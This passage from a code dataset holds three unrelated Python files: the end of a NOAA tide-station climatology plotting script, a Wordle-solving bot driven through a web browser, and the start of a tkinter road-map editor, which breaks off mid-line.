1\n guess_amplitude = 3*np.std(data)/(2**0.5)\n guess_phase = 0\n guess_offset = np.mean(data)\n p0 = [guess_freq, guess_amplitude,\n guess_phase, guess_offset]\n\n # Function to fit\n def my_cos(x, freq, amplitude, phase, offset):\n return np.cos(x * freq + phase) * amplitude + offset\n\n # Fit curve to data\n fit = curve_fit(my_cos, X, data, p0=p0)\n\n if plot:\n fig, ax = plt.subplots(1, 1, figsize=(12,5))\n\n ax.plot(data, label=data.name)\n ax.plot(fit, color='red', label=f'Cosine fit')\n\n ax.legend(loc='best')\n plt.show()\n else:\n return my_cos(np.array(X), *fit[0])\n\ndef daily_climo(data, var, station, stationid, first_time, last_time,\n scheme='mg',show=False):\n \"\"\"Create a daily climatology plot for environmental variable 'var'\n from 'data'.\n \n Inputs:\n data: dict, climatological stats dictionary from Data class object\n var: str, one of the available environmental variables in 'data'\n station: str, name of CO-OPS station to include in plot title\n stationid: int, CO-OPS station ID number to include in plot title\n first_time: timestamp of oldest observation to include in plot title\n last_time: timestamp of latest observation to include in plot title\n scheme: str, either 'mg' or 'bm' specifying whether to use M. Grossi's\n color scheme or B. 
McNoldy's\n show: Bool, display the plot to screen instead of saving to file\n \"\"\"\n\n # Dates for x axis\n xdates = pd.date_range(start='2020-01-01',end='2020-12-31', freq='1D')\n df = data[var]\n \n # Color dictionary\n colors = dict(\n mg=dict({\n 'Record High Year': 'white',\n 'Record High': 'orange',\n 'Average High': 'red',\n 'Daily Average': 'grey',\n 'Average Low': 'purple',\n 'Record Low': 'white'}),\n bm=dict({\n 'Record High Year': 'white',\n 'Record High': 'orange',\n 'Average High': 'red',\n 'Daily Average': 'grey',\n 'Average Low': 'purple',\n 'Record Low': 'white'} \n ))\n \n # Create figure\n fig = go.Figure()\n\n # Record highs\n # High records this year\n thisYear = pd.to_datetime('today').year\n highRecords = df.loc[df['Record High Year']==thisYear, 'Record High']\n highRecords.index = pd.to_datetime(highRecords.index+'-2020')\n fig.add_trace(\n go.Scatter(\n x=highRecords.index, y=highRecords.values,\n name=f'{pd.to_datetime(\"today\").year} Record'.upper(),\n mode='markers',\n marker=dict(size=6, color='white'),\n hoverinfo='none'\n ))\n fig.add_trace(\n go.Scatter(\n x=xdates, y=df['Record High'],\n name='Record High'.upper(),\n mode='markers',\n marker=dict(size=3, color='orange')\n ))\n # Average highs\n fig.add_trace(\n go.Scatter(\n x=xdates, y=cos_fit(df['Average High']).round(1),\n name='Average High'.upper(),\n marker=dict(size=3, color='red')\n ))\n # Daily average\n fig.add_trace(\n go.Scatter(\n x=xdates, y=cos_fit(df['Daily Average']).round(1),\n name='Daily Average'.upper(),\n marker=dict(size=3, color='grey')\n ))\n # Average lows\n fig.add_trace(\n go.Scatter(\n x=xdates,\n y=cos_fit(df['Average Low']).round(1),\n name='Average Low'.upper(),\n marker=dict(size=3, color='purple')\n ))\n # Record lows\n fig.add_trace(\n go.Scatter(\n x=xdates, y=df['Record Low'],\n name='Record Low'.upper(),\n mode='markers',\n marker=dict(size=3, color='white')\n ))\n # Hover box\n fig.update_traces(\n # mode = 'markers', \n hoverlabel = dict(bordercolor='white')\n )\n # Plot settings\n fig.update_layout(\n template='plotly_dark',\n # paper_bgcolor='rgba(0,0,0,0)',\n # plot_bgcolor='rgba(0,0,0,0)',\n height=600, width=1000,\n title=dict(text=f'Daily {var} Climatology for {station}'.upper()+\n '
NOAA CO-OPS Site {}, {} - {}'.format(\n stationid,\n first_time.strftime('%m/%d/%Y'),\n last_time.strftime('%m/%d/%Y')),\n font=dict(size=20,\n # family='PT Sans Narrow'\n )),\n # yaxis = dict(title=f'{var} ({vk.units[var]})'.upper()),\n xaxis = dict(showgrid=False, showspikes=True,\n dtick='M1', tickformat='%b %d'),\n hovermode='x unified',\n legend=dict(itemsizing='constant'),\n hoverlabel=dict(font_size=12,\n # font_family=\"Rockwell\"\n )\n )\n if show:\n fig.show()\n else:\n return fig\n\ndef monthly_climo(data, var, station, stationid, first_time, last_time,\n scheme='mg', show=False):\n \"\"\"Create a monthly climatology plot for environmental variable 'var'\n from 'data'.\n \n Inputs:\n data: dict, climatological stats dictionary from Data class object\n var: str, one of the available environmental variables in 'data'\n station: str, name of CO-OPS station to include in plot title\n stationid: int, CO-OPS station ID number to include in plot title\n first_time: timestamp of oldest observation to include in plot title\n last_time: timestamp of latest observation to include in plot title\n scheme: str, either 'mg' or 'bm' specifying whether to use M. Grossi's\n color scheme or B. McNoldy's\n show: Bool, display the plot to screen instead of saving to file\n \"\"\"\n\n # Dates for x axis\n xdates = pd.date_range(start='2020-01-01',end='2020-12-31', freq='MS')\n df = data[var]\n \n # Color dictionary\n colors = dict(\n mg=dict({\n 'Record High Year': 'white',\n 'Record High': 'orange',\n 'Average High': 'red',\n 'Monthly Average': 'grey',\n 'Average Low': 'purple',\n 'Record Low': 'white'}),\n bm=dict({\n 'Record High Year': 'white',\n 'Record High': 'orange',\n 'Average High': 'red',\n 'Monthly Average': 'grey',\n 'Average Low': 'purple',\n 'Record Low': 'white'} \n ))\n \n # Create figure\n fig = go.Figure()\n\n # Record highs\n # High records this year\n thisYear = pd.to_datetime('today').year\n high_records = df.loc[df['Record High Year']==thisYear, 'Record High']\n high_records.index = pd.to_datetime(high_records.index+'-2020')\n fig.add_trace(\n go.Scatter(\n x=high_records.index, y=high_records.values,\n name=f'{pd.to_datetime(\"today\").year} Record'.upper(),\n mode='markers',\n marker=dict(size=6, color='white'),\n hoverinfo='none'\n ))\n fig.add_trace(\n go.Scatter(\n x=xdates, y=df['Record High'],\n name='Record High'.upper(),\n mode='markers',\n marker=dict(size=3, color='orange')\n ))\n # Average highs\n fig.add_trace(\n go.Scatter(\n x=xdates, y=cos_fit(df['Average High']).round(1),\n name='Average High'.upper(),\n marker=dict(size=3, color='red')\n ))\n # Daily average\n fig.add_trace(\n go.Scatter(\n x=xdates, y=cos_fit(df['Monthly Average']).round(1),\n name='Monthly Average'.upper(),\n marker=dict(size=3, color='grey')\n ))\n # Average lows\n fig.add_trace(\n go.Scatter(\n x=xdates,\n y=cos_fit(df['Average Low']).round(1),\n name='Average Low'.upper(),\n marker=dict(size=3, color='purple')\n ))\n # Record lows\n fig.add_trace(\n go.Scatter(\n x=xdates, y=df['Record Low'],\n name='Record Low'.upper(),\n mode='markers',\n marker=dict(size=3, color='white')\n ))\n # Hover box\n fig.update_traces(\n # mode = 'markers', \n hoverlabel = dict(bordercolor='white')\n )\n # Plot settings\n fig.update_layout(\n template='plotly_dark',\n # paper_bgcolor='rgba(0,0,0,0)',\n # plot_bgcolor='rgba(0,0,0,0)',\n height=600, width=1000,\n title=dict(text=f'Monthly {var} Climatology (\\u00B0F) for {station}'.upper()+\n '
<br>NOAA CO-OPS Site {} | {} - {}'.format(\n                    stationid,\n                    first_time.strftime('%m/%d/%Y'),\n                    last_time.strftime('%m/%d/%Y')),\n                  font=dict(size=20,\n                            # family='PT Sans Narrow'\n                            )),\n        # yaxis = dict(title=f'{var} ({vk.units[var]})'.upper()),\n        xaxis = dict(showgrid=False, showspikes=True,\n                     dtick='M1', tickformat='%b %d'),\n        hovermode='x unified',\n        legend=dict(itemsizing='constant'),\n        hoverlabel=dict(font_size=12,\n                        # font_family=\"Rockwell\"\n                        )\n    )\n    if show:\n        fig.show()\n    else:\n        return fig\n\n# =============================================================================\n# MAIN PROGRAM\n\ndef main():\n    # Parse command line arguments\n    args = parse_args()\n    if not args.outdir:\n        args.outdir = os.getcwd()\n\n    # Download data\n    data = Data(stationname=args.station, stationid=args.id, units=args.units,\n                timezone=args.timezone, datum=args.datum, outdir=args.outdir,\n                hr_threshold=args.hr,\n                day_threshold=args.day,\n                verbose=args.verbose)\n    data.update_data()\n    data.update_stats()\n\n    # Plots\n    vars = data.get_variables()\n    plotDir = os.path.join(os.getcwd(), '_includes')\n    if not os.path.exists(plotDir):\n        os.makedirs(plotDir)\n    for var in vars:\n        # Daily climatology\n        dayfig = daily_climo(data.get_daily_stats_table(),\n                             var=var,\n                             station=data.get_station(),\n                             stationid=data.get_stationid(),\n                             first_time=data.filtered_data[var].dropna(axis=0).index.min(),\n                             last_time=data.filtered_data[var].dropna(axis=0).index.max())\n        fname = 'figure-{}-{}-daily.html'.format(\n            data.camel(data.get_station()).lower(),\n            var.lower().replace(' ', ''))\n        pio.write_html(dayfig, file=os.path.join(plotDir, fname),\n                       auto_open=True)\n\n        # Monthly climatology\n        monfig = monthly_climo(data.get_monthly_stats_table(),\n                               var=var,\n                               station=data.get_station(),\n                               stationid=data.get_stationid(),\n                               first_time=data.filtered_data[var].dropna(axis=0).index.min(),\n                               last_time=data.filtered_data[var].dropna(axis=0).index.max())\n        fname = 'figure-{}-{}-monthly.html'\\\n            .format(data.camel(data.get_station()).lower(),\n                    var.lower().replace(' ', ''))\n        pio.write_html(monfig, file=os.path.join(plotDir, fname),\n                       auto_open=True)\n\nif __name__ == \"__main__\":\n    main()","repo_name":"mdgrossi/climatologyweb","sub_path":"climoDL.py","file_name":"climoDL.py","file_ext":"py","file_size_in_byte":14982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11425034533","text":"import random\nimport web_driver_connection.main_driver\nimport web_driver_connection.main_driver\nimport os\n\ndef load_words(l = 5):\n    with open('words_alpha.txt') as word_file:\n        valid_words = set(word_file.read().split())\n\n    return valid_words\n\n\ndef search(words,greens, yellows, blacks):\n    print(greens, yellows, blacks)\n    print([yellows[b] for b in yellows])\n    one = {word for word in words if len([yellows[b] for b in yellows if b in word]) == len(yellows)}\n    two = {word for word in words if len([b for b in blacks if len([i for i in range(len(blacks[b])) if word[blacks[b][i]] != b]) == len(blacks[b])]) == len(blacks)}\n    three = {word for word in words if len([b for b in greens if len([i for i in range(len(greens[b])) if word[greens[b][i]] == b]) == len(greens[b])]) == len(greens)}\n\n    print(one)\n\n    res = {word for word in words\n           if len([b for b in yellows if b in word]) == len(yellows)\n           and len([b for b in blacks if len([i for i in range(len(blacks[b])) if word[blacks[b][i]] != b]) == len(blacks[b])]) == len(blacks)\n           and len([b for b in greens if len([i for i in range(len(greens[b])) if 
word[greens[b][i]] == b]) == len(greens[b])]) == len(greens)}\n return res\n\n\ndef check_greens(word, greens):\n valid = not any([True for buchstabe in greens for i in greens[buchstabe] if word[i] != buchstabe])\n return valid\n\n\ndef check_yellows(word, yellows):\n print(word)\n valid = not any([True for buchstabe in yellows for i in yellows[buchstabe] if word[i] == buchstabe])\n for i, s in enumerate(word):\n if s in yellows:\n if i in yellows[s]:\n valid = False\n\n for i in yellows:\n if i not in word:\n valid = False\n\n #print(\"filtering for yellow condition\")\n #print(valid)\n\n\n return valid\n\n\ndef check_blacks(word, blacks):\n valid = not any([True for buchstabe in blacks if buchstabe in word])\n\n return valid\n\n\ndef check(alpha_pos, greens, yellows, blacks, words):\n valid_words = {word for word in words if check_greens(word, greens) and check_yellows(word, yellows) and check_blacks(word, blacks)}\n\n return valid_words\n\n\ndef val_append(dict_obj, key, value):\n if key in dict_obj:\n if not isinstance(dict_obj[key], list):\n # converting key to list type\n dict_obj[key] = [dict_obj[key]]\n # Append the key's value in list\n if value in dict_obj[key]:\n return\n dict_obj[key].append(value)\n else:\n dict_obj.update({key: [value]})\n\n\ndef apply_potential_count(alpha_pos, key):\n for position in alpha_pos[key]:\n if alpha_pos[key][position] != 'locked':\n lock = [i for i in alpha_pos[key] if alpha_pos[key][i] == 'locked']\n alpha_pos[key][position] = len(alpha_pos[key]) - len([i for i in alpha_pos[key] if alpha_pos[key][i] == 'locked'])\n\n\ndef apply_greens(alpha_pos, greens):\n print(\"applying green to: \")\n print(alpha_pos)\n for green in greens:\n indizes = greens[green]\n for i in indizes:\n if i in alpha_pos[green]:\n alpha_pos[green][i] = 'locked'\n apply_potential_count(alpha_pos, green)\n print(\"green applied:\")\n print(alpha_pos)\n\n\ndef apply_yellows(alpha_pos, yellows):\n print(\"applying yellow to: \")\n print(alpha_pos)\n print(yellows)\n for yellow in yellows:\n indizes = yellows[yellow]\n for i in indizes:\n if i in alpha_pos[yellow]:\n if alpha_pos[yellow][i] != 'locked':\n del alpha_pos[yellow][i]\n\n apply_potential_count(alpha_pos, yellow)\n print(\"yellow applied: \")\n print(alpha_pos)\n\n\ndef apply_blacks(alpha_pos, blacks):\n print(\"applying black to: \")\n print(alpha_pos)\n for black in blacks:\n indizes = blacks[black]\n for i in indizes:\n if i in alpha_pos[black]:\n if alpha_pos[black][i] != 'locked':\n del alpha_pos[black][i]\n\n print(\"black applied: \")\n print(alpha_pos)\n\n\ndef simulate(words_input, greens_input, words_dict):\n alph = 'abcdefghijklmnopqrstuvwxyz'\n alpha_pos = {}\n n = len(words_input[0])\n for b in alph:\n alpha_pos.update({b: {i : n for i in range(n)}})\n greens, yellows, blacks = {}, {}, {}\n forbidden = {}\n for word_input, green_input in zip(words_input, greens_input):\n print(word_input)\n new_greens = green_input\n new_greens = [int(s) for s in new_greens.split(\" \") if len(new_greens) != 0]\n {val_append(greens, s.lower(), i) for i, s in enumerate(word_input) if i in new_greens}\n {val_append(yellows, s.lower(), i) for i, s in enumerate(word_input) if s.isupper() and i not in new_greens}\n\n new_yellows = [s.lower() for i, s in enumerate(word_input) if s.isupper() and i not in new_greens]\n {val_append(blacks, s.lower(), i) for i, s in enumerate(word_input) if s.islower() and i not in new_greens and i not in new_yellows}\n\n word_input = word_input.lower()\n for g in new_greens:\n # print(\"!!!\")\n # 
print(g)\n # print(word_input[g])\n if word_input[g] in yellows:\n del yellows[word_input[g]]\n apply_greens(alpha_pos, greens)\n apply_yellows(alpha_pos, yellows)\n apply_blacks(alpha_pos, blacks)\n\n words_dict = check(alpha_pos, greens, yellows, blacks, words_dict)\n print(words_dict)\n print(\"keyboard\")\n print(greens)\n print(new_greens)\n print(yellows)\n print(blacks)\n\n\ndef play(words_dict):\n alph = 'abcdefghijklmnopqrstuvwxyz'\n alpha_pos = {}\n\n web_connector = web_driver_connection.main_driver.WordleConnection()\n\n for b in alph:\n alpha_pos.update({b: {i: 5 for i in range(5)}})\n greens, yellows, blacks = {}, {}, {}\n\n guess_list = [word for word in words_dict]\n sorted_by_vowels = sorted(guess_list, key=lambda word: sum(ch in 'aeiou' for ch in word), reverse=True)\n relevancy_dict = relevancy_score(guess_list)\n\n output = ('sorted by vowels: ', sorted(sorted_by_vowels,\n key=lambda word: sum(ch in 'aeiou' for ch in word if ch not in greens)))\n\n\n output_relevant = compare_guess(guess_list, relevancy_dict)\n next_guess = 'salet'\n\n\n # input(\"load...\")\n while len(words_dict) >= 1:\n word_input, new_greens = web_connector.write(guess=next_guess)\n while not word_input:\n print(\"here\")\n print(word_input)\n next_guess = generate_guess(guess_list, output_relevant)\n print(next_guess)\n word_input, new_greens = web_connector.write(guess=next_guess)\n\n\n #new_greens = [int(s) for s in new_greens.split(\" \") if len(new_greens) != 0]\n {val_append(greens, s.lower(), i) for i, s in enumerate(word_input) if i in new_greens}\n {val_append(yellows, s.lower(), i) for i, s in enumerate(word_input) if s.isupper() and i not in new_greens}\n\n new_yellows = [s.lower() for i, s in enumerate(word_input) if s.isupper() and i not in new_greens]\n\n {val_append(blacks, s.lower(), i) for i, s in enumerate(word_input) if\n (s.islower() and s not in [word_input[new_g].lower() for new_g in new_greens] and i not in new_yellows)}\n\n\n word_input = word_input.lower()\n for g in new_greens:\n print(\"!!!\")\n print(g)\n print(word_input[g])\n if word_input[g] in yellows:\n del yellows[word_input[g]]\n apply_greens(alpha_pos, greens)\n apply_yellows(alpha_pos, yellows)\n apply_blacks(alpha_pos, blacks)\n print('G Y B', greens, yellows, blacks)\n\n words_dict_filtered = check(alpha_pos, greens, yellows, blacks, words_dict)\n\n guess_list_filtered = [word for word in words_dict_filtered]\n\n sorted_by_vowels = sorted(guess_list_filtered, key = lambda word: sum(ch in 'aeiou' for ch in word))\n\n relevancy_dict = relevancy_score(guess_list_filtered)\n\n output = ('sorted by vowels: ', sorted(sorted_by_vowels,\n key = lambda word: sum(ch in 'aeiou' for ch in word if ch not in greens)))\n\n output_relevant = compare_guess(guess_list_filtered, relevancy_dict)\n\n # output = liste, output relevant = relevanzliste\n print(output)\n print(output_relevant)\n print(len(words_dict) + len(output))\n next_guess = generate_guess(guess_list, output_relevant)\n print(next_guess)\n\n\ndef relevancy_score(input_dict):\n import csv\n\n with open('unigram_freq.csv', mode='r') as inp:\n word_frequency = csv.reader(inp)\n dict_from_csv = {int(rows[1]): rows[0] for rows in word_frequency}\n\n #print(dict_from_csv)\n\n# filter dict 5 letter words\n relevancy_dict = {}\n\n for (key, value) in dict_from_csv.items():\n # Check if len == 5\n if len(value) == 5:\n relevancy_dict[key] = value\n #print(\"Sortiert nach Relevanz: \", relevancy_dict)\n return relevancy_dict\n\ndef compare_guess(guess_list, 
relevancy_dict):\n\n output_relevant = [word for (key, word) in relevancy_dict.items() if word in guess_list]\n\n return output_relevant\n\ndef generate_guess(guess_list, output_relevant):\n if len(output_relevant) > 0:\n print(\"output relevant\")\n print(output_relevant)\n guess = random.choice(output_relevant)\n print ('GUESS: ', guess)\n return guess\n else:\n print(\"guess_list\")\n print(guess_list)\n guess = random.choice(guess_list)\n print('GUESS:',guess)\n return guess\n\ndef pre_processing():\n english_words = load_words()\n words_dict = {word: 1 for word in english_words if len(word) == 5}\n guess_list = [word for word in words_dict]\n relevancy_dict = relevancy_score(words_dict)\n frequent_words = open('unigram_freq.csv', mode='r')\n\n output_relevant = compare_guess(guess_list, relevancy_dict)\n\n return words_dict, guess_list\n\n\nif __name__ == '__main__':\n words_dict, guess_list = pre_processing()\n\n print(play(words_dict))\n\n\n '''\n # run relevancy_score:\n english_words = load_words()\n words_dict = {word: 1 for word in english_words if len(word) == 5}\n guess_list = [word for word in words_dict]\n sorted_by_vowels = guess_list\n relevancy_dict = relevancy_score(words_dict)\n\n\n print(compare_guess(guess_list, relevancy_dict))\n\n\n '''\n\n '''# run wordle:\n\n starters = ['louse', 'ahead', 'house']\n #test = ['aunts', 'mIght', 'bRIck', 'PRIdE']\n #greens = ['' , '', '1 2', '0 1 2 4']\n test = ['eAGle', 'AmONG', 'prize', 'suCks', 'biNit']\n greens = ['', '', '', '', '2']\n\n\n english_words = load_words()\n words_dict = {word: 1 for word in english_words if len(word) == 5}\n guess_list = [word for word in words_dict]\n relevancy_dict = relevancy_score(words_dict)\n solution_list = compare_guess(guess_list, relevancy_dict)\n\n play(words_dict, guess_list)\n #simulate(test, greens, words_dict)\n '''\n\n\n\n\n\n","repo_name":"FabianBirringer/worlde_bot","sub_path":"wordle_main.py","file_name":"wordle_main.py","file_ext":"py","file_size_in_byte":11063,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73361423929","text":"import tkinter as tk\nfrom PIL import Image, ImageTk\nfrom math import cos, sin, atan, sqrt, acos\n\nmap_filename = \"maps/map0.png\"\nimage = Image.open(map_filename)\n\nW, H = image.size\nmargin = 5000\ndx,dy = 20,20 # Elementary move for the canvas\n\ncross_list = []\ngenerator_cross_list = []\nroad_coords_list = []\n\nroot = tk.Tk()\n\ndef angle(x,y):\n \"\"\"Give the oriented angle [-3.14 ; +3.14] between the vector (x,y) and the horizontal axis (1,0)\"\"\"\n # The y-axis is \"reversed\" in Tkinter !\n # We use vector product to find the orientation of the vectors\n sign = 1 if y >= 0 else -1\n # We use scalar product to find the angle and multiply it by the orientation\n return acos((x) / sqrt(x*x + y*y)) * sign\n\ndef distance(x1,y1, x2, y2):\n return ((x2-x1)**2 + (y2-y1)**2)**0.5\n\n\nclass Map(tk.Canvas):\n def __init__(self, master, width, height, background):\n # Initialize a canvas\n tk.Canvas.__init__(self, master=master, width=width, height=height, background=background)\n # Keep track of the current scale to make correct operations when zoomed in or out\n self.current_scale = 1\n self.orig_img = image\n self.bg = None\n self.redraw_bg()\n self.configure(scrollregion=(-margin, -margin, margin, margin))\n self.configure(xscrollincrement=1)\n self.configure(yscrollincrement=1)\n self.create_rectangle(0,0,W-1, H-1, tags=\"container\")\n\n def scroll_start(self, event):\n # Save the 
current position of the map\n self.scan_mark(event.x, event.y)\n\n def scroll_move(self, event):\n # Move the map accordingly to the new event position\n self.scan_dragto(event.x, event.y, gain=1)\n\n def zoom(self, event):\n # Zoom in if the user scrolls up, zoom out otherwise\n factor = 0\n if event.delta > 0 or event.keysym == \"Up\":\n factor = 2\n elif event.delta < 0 or event.keysym == \"Down\":\n factor = .5\n\n # Scale every object on the canvas by (factor)\n self.current_scale *= factor\n self.redraw_bg(self.canvasx(event.x), self.canvasy(event.y))\n self.scale(\"all\", 0,0 , factor, factor)\n margin = self.current_scale * 5000\n\n # Reconfiguration for the scrollbars\n self.configure(scrollregion=(-margin, -margin, margin, margin))\n x,y = self.canvasx(event.x), self.canvasy(event.y)\n\n\n self.xview_scroll(int(x*(factor-1)), \"units\")\n self.yview_scroll(int(y*(factor-1)), \"units\")\n\n def redraw_bg(self, x=0, y=0):\n if self.bg: self.delete(self.bg)\n w, h = self.orig_img.size\n s = self.current_scale\n\n tmp = self.orig_img.crop((0,0, w, h))\n self.img = ImageTk.PhotoImage(tmp.resize((int(w*s),int(h*s))))\n self.bg = self.create_image(0,0, image=self.img, anchor=\"nw\", tag = \"bg\")\n self.tag_lower(\"bg\", \"all\")\n\n def draw_cross(self, x, y, build_type):\n radius = 10 * self.current_scale\n if build_type == \"cross\":\n a = self.create_oval(x-radius, y-radius, x+radius, y+radius, fill=\"grey26\", outline = \"grey26\", tag=\"cross\")\n elif build_type == \"generator\":\n a = self.create_oval(x-radius, y-radius, x+radius, y+radius, fill=\"grey26\", outline = \"red\", tag=\"generator\")\n return a\n\n def draw_road(self, road):\n (l, w) = (distance(road.cross1.x, road.cross1.y, road.cross2.x, road.cross2.y), 5)\n ang = angle(road.cross2.x-road.cross1.x, road.cross2.y-road.cross1.y)\n s = self.current_scale\n (x,y) = road.cross2.x*s, road.cross2.y*s\n dx = s*sin(ang)*w/2\n dy = - s*cos(ang)*w/2\n dxb = -s*l*cos(ang)\n dyb = -s*l*sin(ang)\n return self.create_polygon(x+dx, y+dy, x-dx, y-dy, x+dxb-dx, y+dyb-dy, x+dxb+dx, y+dyb+dy, fill=\"grey26\", tag=\"road\")\n\n\nclass Container(tk.Frame):\n def __init__(self, root):\n # Initialize a Frame\n tk.Frame.__init__(self, root)\n # Initialize the canvas representating the map\n self.map = Map(self, W, H, \"SeaGreen1\")\n self.map.create_rectangle(0,0,W-1, H-1, tags=\"container\")\n\n # Setting up scrollbars to be able to move the map in the window\n self.xsb = tk.Scrollbar(self, orient=\"horizontal\", command=self.map.xview)\n self.ysb = tk.Scrollbar(self, orient=\"vertical\", command=self.map.yview)\n self.map.configure(yscrollcommand=self.ysb.set, xscrollcommand=self.xsb.set)\n\n # Place the canvas and scrollbars in their correct positions\n # Using a grid system to sustain further modifications of the layout\n self.xsb.grid(row=1, column=0, sticky=\"ew\")\n self.ysb.grid(row=0, column=1, sticky=\"ns\")\n self.map.grid(row=0, column=0, sticky=\"nsew\")\n\n # Allows the canvas to expand as much as it can\n self.grid_rowconfigure(0, weight=1)\n self.grid_columnconfigure(0, weight=1)\n\nclass Controls(tk.Frame):\n def __init__(self, root):\n tk.Frame.__init__(self, root)\n self.creation_menu = tk.LabelFrame(self, text=\"Creation menu\", padx=5, pady=5)\n self.creation_menu.grid(row=0, column=0, sticky=\"new\")\n\n self.build_type = tk.StringVar()\n self.build_type.set(\"generator\")\n self.cross_b = tk.Radiobutton(self.creation_menu, text=\"Generator\", variable=self.build_type, value=\"generator\")\n self.generator_cross_b = 
tk.Radiobutton(self.creation_menu, text=\"Cross\", variable=self.build_type, value=\"cross\")\n self.road_b = tk.Radiobutton(self.creation_menu, text=\"Road\", variable=self.build_type, value=\"road\")\n self.priority_axis_b = tk.Radiobutton(self.creation_menu, text=\"Priority\", variable = self.build_type, value=\"priority\")\n self.cross_b.grid(row=0, column=0)\n self.generator_cross_b.grid(row=0, column=1)\n self.road_b.grid(row=0, column=2)\n self.priority_axis_b.grid(row=1, column=1)\n\n self.generate_b = tk.Button(self.creation_menu, text=\"Extract data !\", command=extract_data)\n self.generate_b.grid(row=2, column=1)\n\n self.information = tk.LabelFrame(self, text=\"Information\", padx=5, pady=5)\n self.information.grid(row=1, column=0, sticky=\"new\")\n\n tk.Label(master = self.information, text = \"Nombre de croisements : \").grid(row=0, column=0)\n self.nb_cross = tk.IntVar()\n self.nb_cross.set(0)\n tk.Label(master = self.information, textvariable = self.nb_cross).grid(row=0, column=1)\n self.nb_roads = tk.IntVar()\n self.nb_roads.set(0)\n tk.Label(master = self.information, text=\"Nombre de routes : \").grid(row=1, column=0)\n tk.Label(master = self.information, textvariable = self.nb_roads).grid(row=1, column=1)\n\ndef keyboard_listener(event):\n if event.char == \" \":\n controls.build_type.set(False) if controls.build_type.get() else controls.build_type.set(True)\n elif event.keysym == \"Right\":\n map.scan_mark(0,0)\n map.scan_dragto(-dx,0)\n elif event.keysym == \"Left\":\n map.scan_mark(0,0)\n map.scan_dragto(dx,0)\n elif event.keysym == \"Up\":\n map.scan_mark(0,0)\n map.scan_dragto(0,dy)\n elif event.keysym == \"Down\":\n map.scan_mark(0,0)\n map.scan_dragto(0,-dy)\n\n\nclass Cross:\n list = []\n def __init__(self, x, y, rep):\n self.x = x\n self.y = y\n self.rep = rep\n self.roads = []\n self.priority_axis = []\n Cross.list.append(self)\nclass Generator:\n list = []\n def __init__(self, x, y, rep):\n self.x = x\n self.y = y\n self.rep = rep\n self.roads = []\n self.priority_axis = []\n Generator.list.append(self)\nclass Road:\n list = []\n def __init__(self, cross1, cross2, rep):\n self.cross1 = cross1\n self.cross2 = cross2\n self.priority_indicator_1 = None\n self.priority_indicator_2 = None\n self.rep = rep\n Road.list.append(self)\n\n\nselected_cross = []\ncross_for_priority = None\nreal_cross_priority = None\nselected_roads = []\n\ndef selector(event):\n \"\"\"Take the correct action according to the user input\"\"\"\n global cross_for_priority, real_cross_priority, selected_roads\n x,y = map.canvasx(event.x), map.canvasy(event.y)\n s = map.current_scale\n objects = list(map.find_overlapping(x, y, x, y))\n for obj in objects:\n if \"bg\" in map.gettags(obj):\n objects.remove(obj)\n print(objects)\n mode = controls.build_type.get()\n\n if mode == \"cross\" or mode == \"generator\":\n if len(objects) == 0:\n if controls.build_type.get() == \"generator\":\n Generator(x//s,y//s, map.draw_cross(x,y, \"generator\"))\n elif controls.build_type.get() == \"cross\":\n Cross(x//s, y//s, map.draw_cross(x,y, \"cross\"))\n controls.nb_cross.set(controls.nb_cross.get()+1)\n\n if len(objects) == 1:\n obj = objects[0]\n tags = map.gettags(obj)\n print(tags)\n if \"cross\" in tags :\n for c in Cross.list:\n if c.rep == obj:\n map.delete(c.rep)\n controls.nb_cross.set(controls.nb_cross.get()-1)\n Cross.list.remove(c)\n elif \"generator\" in tags:\n for g in Generator.list:\n if g.rep == obj:\n map.delete(g.rep)\n controls.nb_cross.set(controls.nb_cross.get()-1)\n 
Generator.list.remove(g)\n elif \"road\" in tags:\n for r in Road.list:\n if r.rep == obj:\n map.delete(r.rep)\n controls.nb_roads.set(controls.nb_roads.get()-1)\n Road.list.remove(r)\n\n elif mode == \"road\":\n if len(objects) == 1:\n obj = objects[0]\n tags = map.gettags(obj)\n if \"road\" in tags:\n for r in Road.list:\n if r.rep == obj:\n map.delete(r.rep)\n controls.nb_roads.set(controls.nb_roads.get()-1)\n road = Road.list.pop(Road.list.index(r))\n road.cross1.roads.remove(road)\n road.cross2.roads.remove(road)\n elif \"cross\" in tags or \"generator\" in tags:\n if obj not in selected_cross:\n selected_cross.append(obj)\n map.itemconfig(obj, fill=\"green\")\n if len(selected_cross) == 2:\n real_cross = []\n for c in Cross.list:\n if c.rep in selected_cross:\n real_cross.append(c)\n for g in Generator.list:\n if g.rep in selected_cross:\n real_cross.append(g)\n road = Road(real_cross[0], real_cross[1], None)\n real_cross[0].roads.append(road)\n real_cross[1].roads.append(road)\n road.rep = map.draw_road(road)\n controls.nb_roads.set(controls.nb_roads.get()+1)\n for obj in selected_cross:\n map.itemconfig(obj, fill=\"grey26\")\n selected_cross.clear()\n\n else:\n selected_cross.remove(obj)\n map.itemconfig(obj, fill=\"grey26\")\n\n elif mode == \"priority\":\n if len(objects) == 1:\n obj = objects[0]\n tags = map.gettags(obj)\n\n if \"cross\" in tags or \"generator\" in tags:\n if cross_for_priority != obj:\n map.itemconfig(cross_for_priority, fill=\"grey26\")\n cross_for_priority = obj\n map.itemconfig(obj, fill=\"pink\")\n for c in Cross.list:\n if c.rep == obj :\n real_cross_priority = c\n for g in Generator.list:\n if g.rep == obj :\n real_cross_priority = g\n\n\n if \"road\" in tags:\n if cross_for_priority != None:\n for r in Road.list:\n if r.rep == obj:\n if r not in real_cross_priority.priority_axis:\n real_cross_priority.priority_axis.append(r)\n radius = 2 * map.current_scale\n if real_cross_priority== r.cross1:\n r.priority_indicator_1 = map.create_oval(x-radius, y-radius, x+radius, y+radius, fill=\"red\")\n else:\n r.priority_indicator_2 = map.create_oval(x-radius, y-radius, x+radius, y+radius, fill=\"red\")\n else:\n real_cross_priority.priority_axis.remove(r)\n if real_cross_priority== r.cross1:\n map.delete(r.priority_indicator_1)\n else:\n map.delete(r.priority_indicator_2)\n\n\n if len(objects) > 2:\n print(\"Unhandled case, you dummy!\")\n\ndef extract_data():\n print(\"extracting data\")\n scale = 200/91\n file = open(\"maps/map_data.txt\", \"w\")\n cross_list = []\n road_list = []\n for g in Generator.list:\n cross_list.append(g)\n file.write(\"{} {}\\n\".format(g.x*scale, g.y*scale))\n file.write(\"\\n\")\n for c in Cross.list:\n cross_list.append(c)\n file.write(\"{} {} {} \\n\".format(c.x*scale, c.y*scale, 